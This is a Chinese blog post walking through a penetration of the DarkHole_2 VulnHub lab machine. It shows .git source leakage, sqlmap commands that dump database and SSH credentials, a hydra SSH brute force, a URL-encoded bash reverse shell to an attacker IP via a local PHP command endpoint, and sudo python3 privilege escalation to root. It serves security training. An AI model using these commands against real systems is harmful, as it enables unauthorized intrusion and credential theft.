Dark_hole2靶机实战——详细版

于 2024-07-02 18:10:23 发布
阅读量590 收藏 18
点赞数 12
分类专栏: 靶机渗透 文章标签: 安全 网络安全 web安全 网络攻击模型 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74243714/article/details/140132023
版权

一、信息收集

1、探测存活主机

arp-scan -l

在这里插入图片描述

2、nmap -T4 -A -v 192.168.219.176

在这里插入图片描述

发现目标开启80、22端口,并且80端口存在.git泄露

二、访问目标web服务

1、发现目标web有登录页面,无法弱口令,且前端有邮箱格式校验

在这里插入图片描述

2、访问.git目录,发现存在泄露。

在这里插入图片描述

A下载git-dump工具
创建并进入test目录,下载git-dump工具包

在这里插入图片描述

查看工具

在这里插入图片描述

因为此工具为py编写,所以要准备py环境
pip install -r requirements.txt

在这里插入图片描述

B利用git-dump工具下载目标代码到backup目录
python3 git_dumper.py http://192.168.219.176/.git/ backup

在这里插入图片描述

进入backup目录
a、查看修改历史,git log查看修改文件后形成的哈希值

在这里插入图片描述

b、查看修改内容

git diff

在这里插入图片描述

发现修改历史中有账号和密码,以及dashboard.php页面

username:lush@admin.com

password:321

三、进入网站后台

发现账号管理页面,可以修改账号信息

在这里插入图片描述

发现sql注入漏洞

BP抓包获取cookie值,用来跑sqlmap

在这里插入图片描述

爆出数据库

sqlmap -u http://192.168.219.176/dashboard.php?id=1 --dbs --batch --cookie PHPSESSID=pnkndkqet071pbpplao0rv1tbl

在这里插入图片描述

进一步爆表

sqlmap -u http://192.168.219.176/dashboard.php?id=1 --dbs --batch --cookie PHPSESSID=pnkndkqet071pbpplao0rv1tbl -D darkhole_2 --tables

在这里插入图片描述

进一步爆ssh的列

sqlmap -u http://192.168.219.176/dashboard.php?id=1 --dbs --batch --cookie PHPSESSID=pnkndkqet071pbpplao0rv1tbl -D darkhole_2 -T ssh --columns

在这里插入图片描述

进一步爆ssh列的数据

sqlmap -u http://192.168.219.176/dashboard.php?id=1 --dbs --batch --cookie PHPSESSID=pnkndkqet071pbpplao0rv1tbl -D darkhole_2 -T ssh -C user,pass --dump

在这里插入图片描述

!!!获取到SSH用户密码!!!

user:jehad

pass:fool

爆破另一个表users的列

sqlmap -u http://192.168.219.176/dashboard.php?id=1 --dbs --batch --cookie PHPSESSID=pnkndkqet071pbpplao0rv1tbl -D darkhole_2 -T users --columns

在这里插入图片描述

爆破users列的数据

sqlmap -u http://192.168.219.176/dashboard.php?id=1 --dbs --batch --cookie PHPSESSID=pnkndkqet071pbpplao0rv1tbl -D darkhole_2 -T users -C username,password --dump

在这里插入图片描述

四、利用SSH远程登录目标靶机,并获得root权限。

ssh jehad@192.168.219.176

在这里插入图片描述

提权

查看内核是否有漏洞
uname -a
Linux darkhole 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
无漏洞
sudo -l
Sorry, user jehad may not run sudo on darkhole.(不可 sudo提权)

进行suid提权(不可)
find / -user root -perm -4000 -print 2>/dev/null

--------------计划任务提权-------------

cat /etc/crontab提权

发现有一个端口开启

在这里插入图片描述

发现有一个端口开启

losy cd /opt/web && php -S localhost:9999

进入对应目录,并查看文件

在这里插入图片描述

发现有php代码可以拿到cmd

利用curl工具

curl "http://localhost:9999?cmd=bash -c 'bash -i >& /dev/tcp/192.168.219.169/2345 0>&1'"

发现服务端没有回复

了解curl后发现可以对命令进行url编码来符合curl

bash -c 'bash -i >& /dev/tcp/192.168.219.169/2345 0>&1'
编码后
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%31%39%2e%31%36%39%2f%32%33%34%35%20%30%3e%26%31%27

反弹shell

kali监听:
nc -lvvp 2345
靶机:
curl "http://localhost:9999?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%31%39%2e%31%36%39%2f%32%33%34%35%20%30%3e%26%31%27"

在这里插入图片描述

获取losy用户权限

sudo -l (发现不能够使用sudo,因为没有losy密码)
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper

在这里插入图片描述

方法一:想到爆破密码(一般不建议)

hydra -l losy -P pass4.txt ssh://192.168.219.176 -f

[22][ssh] host: 192.168.219.176 login: losy password: gang

方法二:josy用户退回到根目录查看所有文件(包括隐藏文件)
ls -al发现一个历史命令记录

在这里插入图片描述

cat .bash_history

在这里插入图片描述

获得用户密码losy:gang

SSH登录losy用户(sudo提权)

在这里插入图片描述
在这里插入图片描述

发现可以利用python3提权

sudo python3 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

进入root用户,回到根目录
在这里插入图片描述

窝也不会
关注
  • 12
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub DarkHole靶机
qq_39428734的博客
04-13 533
扫描局域网内存活主机 得到靶机IP 使用namp扫描存活靶机开放了哪些端口 得到靶机开放了22,80端口 进入80端口的网页服务 查看网页源代码没有发现任何东西 爆破目录,查看有那些敏感目录 看到了一个配置文件和后台管理界面,登录界面等等 在config目录里面查看到了database.php文件 我们把它下载下来 啥也没有。。 后台管理界面显示没有权限 登录界面中看到了 正式的登录界面 我们去注册界面看看 注册一个用户并登录试试
靶场-DarkHole1
weixin_58602402的博客
06-16 353
修改密码进行抓包,发现有个id值,在sql注入输入id为1时返回无权访问,猜测id值代表用户,构造payload修改其它用户的密码。4.切换回到/home/john 文件夹,再次执行./toto,就会启动一个 bash,这个 bash 就会切换 shell。2.发现/home/john/toto,切换到这个位置去执行,返回不同的id。开始进行绕过,直接将后缀改为jpg成功上传,同时找到文件上传的位置。2.通过蚁剑将木马上传,kali开启监听等待上线,反弹失败。7.发现个文件上传,尝试上传发现具有限制。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新重磅分享
最新发布
2301_77116622的博客
04-14 886
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1118
一次渗透测试靶机练习
Vulnhub靶机DARKHOLE_ 2
LainWith的博客
09-14 1317
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
靶机darkhole_2
weixin_50339323的博客
09-09 1488
一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP:192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测: gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页 访问 192.168.8.139...
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 4356
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1203
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10
qq_62716256的博客
09-07 2054
XSS漏洞(xss_and_mysql_file靶场实战)——day10
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4796
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 910
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9105
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1417
vulnhub靶场 DarkHole: 2,难度:困难级别
靶机-DarkHole_2
weixin_58602402的博客
06-14 177
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。方法一:wget -r http://192.168.12.168/.git/10.先ssh进行登录losy/gang,根据获取的命令利用python调sh。3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露。1.主机发现,发现靶机ip:192.168.12.168。4.到查找到的目录下查看,发现webshell文件。爆内容,发现用户和密码:jehad/fool。1.用获得的用户和密码进行ssh登录。
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2089
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
DarkHole_2靶场
zjxxxy的博客
06-14 231
vulnhub靶场DarkHole_2攻略
【Vulnhub靶场】DARKHOLE: 2
DG_s1mple
03-23 1614
环境准备 下载靶机导入到vmware 攻击机IP为:192.168.2.18 靶机的IP为:192.168.2.16 信息收集 我们首先使用nmap扫描一下靶机开放的端口信息 发现只开放了ssh跟http服务,我们首先访问一下他的网站 有一个登录界面,其他并无什么有用信息 渗透开始 网站页面没有什么有用信息,我们扫描一下网站的目录 有.git泄露,我们使用工具把它下载下来 看看git的日志 发现有修改过login.php文件,我们回到这次缓存 获得网站后台的账号密码,我们去登录一下 发现这里
安全】vulnub靶机DARKHOLE: 1
qq_43017750的博客
01-20 4191
DARKHOLE: 1 About Release Back to the Top Name: DarkHole: 1 Date release: 18 Jul 2021 Author: Jehad Alqurashi Series: DarkHole Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that a
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值